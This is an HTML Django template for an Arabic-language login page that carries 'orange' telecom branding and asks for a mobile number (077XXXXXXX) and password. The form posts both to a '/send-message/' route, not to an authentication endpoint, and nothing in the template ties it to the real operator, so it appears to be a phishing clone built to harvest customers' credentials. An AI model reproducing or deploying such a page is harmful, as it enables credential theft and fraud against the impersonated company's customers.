<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>تسجيل الدخول</title>
<style>
  .login-section {
    flex: 1;
    padding: 20px;
    background-color: #fff;
  }
  .image-section {
    flex: 1;
    background-image: url('C:/Users/Haidar/Desktop');
    background-size: cover;
  }
  .login-form {
    max-width: 300px;
  }
  .login-form input {
    width: 100%;
    padding: 10px;
    margin-bottom: 10px;
    border: 1px solid #ccc;
    border-radius: 5px;
  }
  .login-form button {
    width: 100%;
    padding: 10px;
    background-color: orange;
    border: none;
    border-radius: 5px;
    color: white;
    cursor: pointer;
  }
  body {
    font-family: 'Arial', sans-serif;
    text-align: center;
    align-items: center;
    justify-content: center;
    
  
  }
  header {
    background-color: #ffffff;
    padding: 10px 0;
    display: flex;
    align-items: center;
    justify-content: space-between;
    padding: 10px 20px;
  }
  .container {
    max-width: 100%;
    width: 100%;
    text-align: center;
    align-items: center;
    justify-content: center;
  }
  .word {
    display: inline-block;
    margin: 25px 30px 0px 0px;
    font-size: 15px;
    font-weight: bold;
  }
  .custom-underline {
    position: relative;
    display: inline;
  }
  .custom-underline:after {
    content: '';
    position: absolute;
    left: 0;
    bottom: -10px;
    height: 2px;
    background-color: rgb(255, 123, 0);
  }
  .w {
    display: inline-block;
    margin: 10px 20px;
    padding: 10px 50px;
    font-size: 16px;
    font-weight: bold;
    border-bottom: 3px solid orange;
    text-align: right;
    justify-content: right;
  }
  .w1 {
    color: rgba(68, 63, 63, 0.548);
    display: inline-block;
    margin: 10px 20px;
    padding: 10px 50px;
    font-size: 16px;
    font-weight: bold;
    border-bottom: 3px solid rgba(68, 63, 63, 0.548);
    text-align: right;
  }
  .c {
    position: relative;
    width: 100%;
    padding-right: 15px;
    padding-left: 15px;
  }
  .menu-icon {
    display: none;
    flex-direction: column;
    cursor: pointer;
    margin-left: 10px;
  }
  .menu-icon div {
    width: 25px;
    height: 3px;
    background-color: #000;
    margin: 4px 0;
  }
  .menu-items {
    margin-left: 60px; 
    padding: 10px;
    }
  @media (max-width: 768px) {
    .menu-items {
      display: none;
      flex-direction: column;
      align-items: flex-start;
      background-color: #fff;
      position: absolute;
      top: 50px;
      left: 0;
      width: 100%;
      padding: 10px;
      box-shadow: 0 2px 5px rgba(0,0,0,0.1);
    }

    .menu-items.active {
      display: flex;
    }

    .menu-icon {
      display: flex;
    }

    .mobile-center {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    text-align: center;
    margin-left: -10px !important;
    /* height: calc(100vh - 80px); Adjusted height */
  }
    .mobile-center h1, .mobile-center h3 {
      margin-left: 0 !important;
      text-align: center !important;
    }
    .mobile-center h1 span {
      margin-left: 100px !important;
      margin-bottom: -5px;
    }
    .mobile-center h1 p {
      margin-left: 200px !important;
      line-height: 0;

        }
    .mobile-center h3 p {
      margin-left: 170px !important;
      line-height: 0.5;
    }
    .mobile-center .login-section {
      text-align: center;
    }
  }
</style>
</head>
<body>
  <header>
    <div class="">
      <div></div>
      <div></div>
      <div></div>
    </div>
    <div style="margin-left: -500px;" class="menu-items">
      <span class="word">English</span>
      <span class="word">الخصوصية والسياسة</span>
      <span class="word">الأحكام والشروط</span>
      <span class="word">المساعدة</span>
    </div>
    <img src="/media/homes/logo.png" alt="orange logo" style="max-width: 100px;">
  </header>
        
  <div class="mobile-center" style="text-align: left; margin-left: 200px;">
    <div>
      <h1 style="margin-bottom: 0px; font-family: ''" >  <span style="color: rgb(0, 0, 0);font-size: 40px;margin-left: 100px;line-height: 0.5;"> الدخول إلى حساب </span></h1>
      <h1  style="  color: #fb6404;font-size: 40px;margin-left: 200px;line-height: 0.5;"><p style="margin-top: -10px;"> orange </p></h1>
      <!-- <h3 style="color: rgba(68, 63, 63, 0.548); font-weight: 600;font-style: italic;margin-left: 180px;line-height: 0.5"><p> متابعة الدخول إلى حسابك </p></h3> -->
      <!-- <p class="w1" style="text-align: right;">&nbsp;&nbsp; الأعمال</p>
      <p class="w" style="text-align: right;">&nbsp;&nbsp;شخصي</p> -->
      <div class="login-section">
        <div class="login-form">
          <form id="loginForm" method="POST" action="/send-message/">
            {% csrf_token %}

            <label style="text-align: right;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="color: rgb(252, 130, 17);">*</span>Orange </label><label> قم بإدخال رقم هاتف</label>
            <input style="margin-top: 10px;" type="text" name="mobileNumber" placeholder="077XXXXXXX">
            <label style="padding: px"> كلمة السر</label><span style="color: rgb(252, 130, 17);">*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>
            <label style="visibility: hidden;;"> <span style="visibility: hidden;color: rgb(252, 130, 17);">*</span> </label><label style="visibility: hidden;;"> كلمة السر</label></label>
            <input style="margin-top: 10px;" type="password" name="password" placeholder="">
            <button type="submit" style="width: 320px; background-color: #fb6404;margin-top: 25px;">تسجيل الدخول</button>
          </form>
        </div>
      </div>
      <div class="image-section">
        <!-- Background image is set via CSS -->
      </div>
    </div>
  </div>
  
  <script>
    document.addEventListener('DOMContentLoaded', function() {
      const menuIcon = document.querySelector('.menu-icon');
      const menuItems = document.querySelector('.menu-items');
      
      menuIcon.addEventListener('click', function() {
        menuItems.classList.toggle('active');
      });
    });
  </script>
</body>
</html>
